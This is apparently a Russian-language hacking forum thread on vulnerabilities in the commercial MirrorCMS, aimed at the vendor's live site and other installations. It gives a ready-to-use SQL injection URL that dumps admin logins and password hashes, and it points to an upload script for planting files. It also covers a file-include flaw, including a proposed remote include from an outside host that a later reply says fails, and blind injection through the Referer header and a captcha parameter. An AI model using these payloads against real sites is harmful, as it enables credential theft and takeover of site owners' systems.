by me) коммерческая платная цмс, производитель http://mirrorcms.ru там же представлены все сайты на это цмс Code: $sSQL="SELECT ".$suffx."_page.title from _page where _page.id='".$_GET['doc']."'"; Если установлен мод рерайт, то название модуля берем из названия первого каталога .. Например офф сайт http://mirrorcms.ru/news/36/ аналогично http://mirrorcms.ru/?ip=news&doc=36 Code: http://mirrorcms.ru/?ip=news&doc=-1+union+select+1,2,3,concat(usr_login,char(64),usr_password),5,6,7,8,9+from+usertable/* md5() проблема в том что админка при инстале указывается вручную, поэтому стандартно /admin/ встречается на 2-3 сайтах. Вообще отпадает смысл в скуле, если мы находим админку.. тогда идем в http://site.com/админка/template/imageload.php вводим сверху диру где разрешена запись (у меня на 4х сайтах оказалась не просто ?image/ как по дэфолту.. а /stock/images/ и третья уязвиость - локальный инклуд при magic quotes off в index.php PHP: if(file_exists("$ip/docn.php")){ include("$ip/docn.php"); }
Какой же он локальный? Что мешает залить на народ.ру файл docn.php и инклудить так: Code: http://[target]/index.php?ip=http://www.hack.narod.ru
ммм.. небольшое дополнение.. там же в индексе.. посимвольный (т.к. нет вывода) брут в HTTP_REFERER Code: stat.php: ... $rname=getenv("HTTP_REFERER"); $doc_res=my_query("SELECT * from referer WHERE rname='$rname' AND datein='$datein'"); ... Капча ./img.php при register_globals on имеем посимвольный брут в параметре id.. кстати.. походу без регистр глобалс сам скрипт не будет работать =) ЗЫ маднет прав. file_exist возвращает тру только при наличие файла на локалхосте +\ если попытаться скормить ему любой вид урла, возвращает false
